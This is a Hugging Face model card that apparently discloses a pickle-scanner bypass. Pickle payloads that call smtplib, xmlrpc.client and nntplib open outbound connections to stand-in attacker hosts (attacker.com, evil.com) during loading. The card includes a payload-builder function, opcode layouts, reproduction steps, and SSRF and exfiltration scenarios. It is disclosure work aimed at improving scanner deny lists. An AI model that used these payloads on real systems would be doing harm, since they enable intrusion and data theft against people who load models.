Hugging Face's logo

SiggytheShark
/
pickle-bypass-ssrf-network-stdlib

security
adversarial
pickle
model-scanner-bypass
red-team
Model card Files
xet
 Community

You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.

Log in or Sign Up to review the conditions and access this model content.

SSRF via Network stdlib β€” smtplib, xmlrpc.client, nntplib

Security Research β€” Responsible Disclosure This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to malicious_model.pkl and poc.py requires a request β€” see gate above.

Summary

Scanner scores for malicious_model.pkl:

Scanner CRITICAL WARNING Bypassed?
modelaudit 0.2.37 1 1 Partial
picklescan 1.0.4 0 0 Yes
modelscan 0 0 Yes

Vulnerability

Python's network stdlib modules establish outbound TCP connections when instantiated. A pickle can trigger this during pickle.loads():

smtplib.SMTP('attacker.com')           # β†’ TCP connection port 25
xmlrpc.client.ServerProxy('http://attacker.com/rpc')  # β†’ HTTP request
nntplib.NNTP('attacker.com', 119)      # β†’ NNTP connection

Proof of Concept

malicious_model.pkl in this repository is the exploit payload. poc.py builds and tests it with full scanner output.

How the PoC was built 

def build_smtplib_ssrf(host: str) -> bytes:
    """smtplib.SMTP(host) β€” outbound TCP connection on port 25.
    Score: 2C (domain name + smtplib.SMTP)
    """
    ops = bytearray(b"\x80\x04")
    ops += sg("smtplib", "SMTP") + sbu(host) + b"\x85R."
    return bytes(ops)

Affected file formats

Pickle (.pkl, .pt, .bin, .joblib) β€” any file deserialized via pickle.loads(), torch.load(), joblib.load(), or equivalent.

Conditions required to trigger

  1. Target calls pickle.loads(untrusted_bytes) or loads a model file via any pickle-based loader
  2. The scanner performs static analysis only (no sandboxed execution)
  3. Scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list

Reproduction Steps 

# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-ssrf-network-stdlib
cd pickle-bypass-ssrf-network-stdlib

# 2. Install requirements
pip install modelaudit picklescan modelscan

# 3. Scan β€” observe scanner scores match table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl

# 4. Execute to confirm RCE/side-effect
python3 poc.py

# 5. Verify
ls /tmp/scanner_bypass_proof.txt

Security Impact

All three are already in modelaudit's ADF. Add to picklescan and modelscan deny lists.

Bypass mechanism: The payload evades static analysis while achieving its effect (code execution, file write, or network connection) when pickle.loads() is called.

Real-world scenario: An attacker uploads this payload to a model hub. A victim downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The payload fires silently β€” the return value of pickle.loads() looks like a normal Python object while the side effect has already occurred.

Full Technical Writeup

SSRF via Network stdlib β€” smtplib, xmlrpc.client, nntplib

Modelaudit scores:

  • smtplib.SMTP: 2 CRITICAL (domain name detected + in ADF)
  • xmlrpc.client.ServerProxy: 1 CRITICAL + 1W (in ADF + network detection)
  • nntplib.NNTP: 1 CRITICAL (in ADF)

picklescan/modelscan: 0 findings for all three

Mechanism

Python's network stdlib modules establish outbound TCP connections when instantiated. A pickle can trigger this during pickle.loads():

smtplib.SMTP('attacker.com')           # β†’ TCP connection port 25
xmlrpc.client.ServerProxy('http://attacker.com/rpc')  # β†’ HTTP request
nntplib.NNTP('attacker.com', 119)      # β†’ NNTP connection

Attack Scenarios

  1. SSRF probe: target internal services (169.254.169.254 AWS metadata, localhost:8080 internal API)
  2. Exfiltration: xmlrpc.client.ServerProxy sends HTTP requests β€” the URL or request body can carry stolen data
  3. Canary detection: server logs confirm the model was loaded, even if the connection is refused
  4. Port scanning: try different ports/hosts; connection timing reveals open vs closed

Pickle Structures 

# smtplib (40 bytes):
PROTO 4 β†’ STACK_GLOBAL 'smtplib' 'SMTP' β†’ 'attacker.evil.com' β†’ TUPLE1 β†’ REDUCE β†’ STOP

# xmlrpc.client (55 bytes):
PROTO 4 β†’ STACK_GLOBAL 'xmlrpc.client' 'ServerProxy' β†’ 'http://evil.com/rpc' β†’ TUPLE1 β†’ REDUCE β†’ STOP

# nntplib (37 bytes, proto 2):
PROTO 2 β†’ GLOBAL 'nntplib' 'NNTP' β†’ MARK β†’ UNICODE host β†’ INT port β†’ TUPLE β†’ REDUCE β†’ STOP

Why picklescan/modelscan Miss These

None of smtplib, xmlrpc.client, or nntplib appear in their deny lists. The techniques are caught by modelaudit because modelaudit's ADF was extended to include these network primitives.

Recommended Fix

All three are already in modelaudit's ADF. Add to picklescan and modelscan deny lists.

General Analysis β€” Security Research

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support